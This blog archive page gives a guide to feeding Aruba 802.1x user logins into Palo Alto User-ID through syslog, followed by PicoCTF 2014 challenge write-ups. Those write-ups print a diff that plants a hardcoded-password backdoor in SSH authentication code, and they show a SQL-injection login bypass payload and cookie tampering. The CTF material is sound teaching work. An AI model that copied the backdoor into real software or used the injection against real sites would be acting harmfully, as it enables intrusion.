Monthly Archives: November 2014
Import Aruba Networks 802.1x USER-ID to Palo Alto Network via syslog

This document outlines the steps needed to import user-id information from an Aruba Networks controller to a Palo Alto Network firewall directly using syslog.

First step is to setup the Aruba controller to log user login/logout and send to a remote syslog server.

Login to the Aruba Networks Controller Web Interface.

Aruba-login

Click on the Configuration tab and select clock from the left hand menu. Make sure an NTP server is setup for the proper time zone to match the Palo Alto firewall.

Aruba-NTP

Next click the logging menu item on the left hand side. Add a new logging server using the management interface of the Palo Alto Network firewall to receive the User-ID information. Multiple can be added if needed.

aruba-add-SNMP-server

Next click the levels tab. Click the User logs check box, Captive portal and dot1x. Select the informational logging level and click done and apply. Also make sure to save the changes.

Aruba-SNMP-logging-level

Next we want to validate the logging information. To do this access the CLI of the Aruba Networks controller. Via console or SSH. Enter enable mode. Once logged into the controller login to an 802.1x authenticated wireless network then type

show user log 20

You should see logging information similar to below. If you see this info we know proper authentication logging is taking place and the syntax of the log.

Aruba-show-user-log

The Aruba portion of the setup should now be complete. Now login to the Web interface of the Palo Alto Networks firewall.

Once logged in click on the device tab. Then click the setup menu item. Make sure the proper time zone is set under the general settings.

Now click on the Services tab and make sure you are using the same NTP server as the Aruba Networks controller.

Next we will make sure the user-id syslog is allowed on the management interface. Go back to the management tab and select Management interface setting. Make sure USER-ID and USER-ID Syslog Listener-UDP is checked.

[SETTINGS IMAGE]

Now we need to setup the user-id syslog filter. Select the User Identification menu item on the left hand side. Next select the Palo Alto Networks User ID Agent Setup settings and click the Syslog Filters Tab.

[image]

Click add on the bottom to create a new filter. Enter a profile name and description and select Field Identifier. Now based on the log information from the Aruba Networks logs fill out the required boxes. From our log sample we have and event string of Authentication Successful a Username Prefix of username= an address prefix of IP= and the Delimiters are \s

[image]

Click ok twice to return to the main User Mappings tab. Now under Server Monitoring click add. Give the monitor a name such as Aruba controller. Click enable. Select the type of Syslog Sender. Enter the IP address of the Aruba controller under network address. Select the connection type of UDP. Now select the filter you just created and enter the default domain name used.

[image]

Now commit and save your changes.

Next login to the CLI of the Palo Alto Network firewall and type

show user server-monitor state all

You should see auth success messages here when a user connects to an 802.1x SSID.

 

You can also type
show user ip-user-mapping all

And you should see user-id information and SYSLOG in the from field for a successful deployment.

 

 

PicoCTF 2014

Pico CTF 2014 finished up last week. It was a nice CTF running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100 plus point challenges are on par with many other CTF challenges.  Below I am going to include some quick writeup. Their were a huge number of challenges and my team was in and out of the CTF as time permits and since we could not be ranked was not a high priority. The write ups below are just the ones I personally did my team completed many more.

 

SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in out network logs show is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host ‘backdoor.picoctf.com (23.21.109.77)’ can’t be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘backdoor.picoctf.com,23.21.109.77’ (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com’s password:
download original tar.gz and run diff
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }

after much google and talks with teammates I found an explanation to the frobcmp function

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

so convert each letter in the password to decimal
XOR with 42
and convert back to ascii

original
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
decimal version
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
xor with 42
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
converted to ascii
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
final ssh password
iminyourmachinestealingyourflags

login as jon via ssh and get flag
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com’s password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$

 

Redacted – 50

You found a letter that may shed light on recent events.

Lets look at meta data

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r–r–
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an adobe illustrator document

Lets see if we can pull out the images

pdfimages -j Redacted.pdf out

<clean image>

there it is the secret one_two_three_four

 

Intercepted Post – 40

We intercepted some of your Dad’s web activity. Can you get a password from his traffic?. You can also view the traffic on CloudShark.

<packet image>

found
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
doesnt work. convert from ascii character codes.
flag{pl$_$$l_y0ur_l0g1n_form$}

complete

Delicious! – 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

page displays

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
use burp suite to edit cookies and send with repeater. tried many 65 was the key.

< burp image>

Flag is session_cookies_are_the_most_delicious

 

Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

open file with objdump and grep for function

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
flag is 08048444

 

snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
recover data

foremost -i disk.img -o file.img
Processing: disk.img
|*|
root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
——————————————————————
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
——————————————————————

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

00000237

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

terminate SQL request with ‘# to bypass ( must be mysql )

use login:
admin’ #

error returns flag

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b

 

PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

run strings on image nothing important. Look at image via hex editor see proper PNG header and end. But more data after. Notice some flag.txt in the text

<hex editor image>

also notice 7z looks like a compressed file on the end.
tail end data off into another file and extract.
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0